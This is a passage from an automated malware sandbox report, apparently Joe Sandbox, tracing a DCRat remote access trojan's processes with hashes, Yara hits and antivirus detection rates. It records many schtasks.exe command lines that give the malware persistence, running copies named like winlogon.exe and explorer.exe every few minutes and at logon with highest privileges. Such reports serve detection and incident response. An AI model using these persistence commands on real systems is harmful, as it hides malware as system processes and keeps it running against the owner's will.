                            Commandline:C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
                            Imagebase:0x960000
                            File size:848384 bytes
                            MD5 hash:4EAF964B744BD6801B5122AE1AFBBDE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.328491076.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 70%, ReversingLabs
                            Reputation:low

                            Target ID:17
                            Start time:00:52:17
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 6 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:19
                            Start time:00:52:17
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:20
                            Start time:00:52:18
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:21
                            Start time:00:52:19
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\winlogon.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:22
                            Start time:00:52:19
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:23
                            Start time:00:52:19
                            Start date:06/08/2022
                            Path:C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe
                            Imagebase:0xcf0000
                            File size:848384 bytes
                            MD5 hash:4EAF964B744BD6801B5122AE1AFBBDE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 55%, Virustotal, Browse
                            • Detection: 70%, ReversingLabs

                            Target ID:24
                            Start time:00:52:19
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:26
                            Start time:00:52:20
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\explorer.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:27
                            Start time:00:52:21
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:28
                            Start time:00:52:21
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:29
                            Start time:00:52:22
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:30
                            Start time:00:52:22
                            Start date:06/08/2022
                            Path:C:\Recovery\explorer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Recovery\explorer.exe
                            Imagebase:0x100000
                            File size:848384 bytes
                            MD5 hash:4EAF964B744BD6801B5122AE1AFBBDE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 100%, Joe Sandbox ML
                            • Detection: 55%, Virustotal, Browse
                            • Detection: 70%, ReversingLabs

                            Target ID:31
                            Start time:00:52:22
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:32
                            Start time:00:52:22
                            Start date:06/08/2022
                            Path:C:\Recovery\explorer.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Recovery\explorer.exe
                            Imagebase:0x2a0000
                            File size:848384 bytes
                            MD5 hash:4EAF964B744BD6801B5122AE1AFBBDE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.370984322.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                            Target ID:33
                            Start time:00:52:23
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:35
                            Start time:00:52:24
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:36
                            Start time:00:52:24
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:37
                            Start time:00:52:24
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:38
                            Start time:00:52:25
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:40
                            Start time:00:52:26
                            Start date:06/08/2022
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f
                            Imagebase:0x7ff73fb60000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            No disassembly